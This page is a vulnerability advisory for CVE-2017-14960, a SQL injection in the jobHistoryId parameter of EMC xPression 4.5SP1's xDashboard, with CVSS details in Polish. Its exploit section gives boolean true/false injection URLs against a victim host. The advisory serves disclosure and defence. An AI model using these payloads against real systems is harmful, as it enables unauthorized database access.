EMC xPression 4.5SP1 Patch 13 model.jobHistoryId SQL Injection

2018.01.04

Credit: Pawel Gocyla

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2017-14960

CWE: CWE-89

Ogólna skala CVSS: 5/10

Znaczenie: 2.9/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Brak

Wpływ na dostępność: Brak

Title: EMC xDashboard - SQL Injection Vulnerability
Author: Pawel Gocyla
Date: 02 January 2018
CVE: CVE-2017-14960
Affected Software:
==================
EMC xPression v4.5SP1 Patch 13
Probably other versions are also vulnerable.
SQL Injection Vulnerability:
==============================
This vulnerability allows an attacker to retrieve information from the
database
Vulnerable parameter: "$model.jobHistoryId"
Exploit:
True Condition: https://[victim]:4000/xDashboard/html/jobhistory/
jobDocHistoryList.action?model.jobHistoryId=1736687378927012979202234841133
and 1=1
False Condition: https://[victim]:4000/xDashboard/html/jobhistory/
jobDocHistoryList.action?model.jobHistoryId=1736687378927012979202234841133
and 1=2
Fix:
====
User input which is putted into sql queries should be properly filtred or
sanitized
References:
============
https://www.owasp.org/index.php/SQL_Injection
Contact:
========
pawellgocyla[at]gmail[dot]com

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

EMC xPression 4.5SP1 Patch 13 model.jobHistoryId SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.